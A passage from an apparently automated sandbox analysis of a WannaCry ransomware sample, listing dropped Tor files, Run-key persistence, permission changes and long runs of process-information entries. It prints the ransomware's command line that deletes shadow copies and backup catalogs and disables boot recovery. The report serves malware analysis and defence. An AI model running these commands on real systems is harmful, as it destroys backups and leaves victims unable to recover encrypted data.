              Source: libssp-0.dll.79.drStatic PE information: section name: /4
              Source: libssp-0.dll.79.drStatic PE information: section name: /19
              Source: libssp-0.dll.79.drStatic PE information: section name: /31
              Source: libssp-0.dll.79.drStatic PE information: section name: /45
              Source: libssp-0.dll.79.drStatic PE information: section name: /57
              Source: libssp-0.dll.79.drStatic PE information: section name: /70
              Source: libssp-0.dll.79.drStatic PE information: section name: /81
              Source: libssp-0.dll.79.drStatic PE information: section name: /92
              Source: ssleay32.dll.79.drStatic PE information: section name: /4
              Source: ssleay32.dll.79.drStatic PE information: section name: /19
              Source: ssleay32.dll.79.drStatic PE information: section name: /31
              Source: ssleay32.dll.79.drStatic PE information: section name: /45
              Source: ssleay32.dll.79.drStatic PE information: section name: /57
              Source: ssleay32.dll.79.drStatic PE information: section name: /70
              Source: ssleay32.dll.79.drStatic PE information: section name: /81
              Source: ssleay32.dll.79.drStatic PE information: section name: /92

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\m.vbs
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Downloads\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dllJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dllJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dllJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\taskdl.exeJump to dropped file
              Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\WannaCry.binJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dllJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\taskse.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\~SDCD53.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\~SDCD54.tmpJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hdahtimfel691
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hdahtimfel691

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\~SDF73B.tmpJump to behavior
              Source: @WanaDecryptor@.exe, 0000004F.00000003.1601937473.000000000275E000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: onion-port
              Source: c:\users\user\desktop\wannacry.bin.zipFile moved: C:\Users\user\AppData\Local\Temp\39.WNCRYTJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
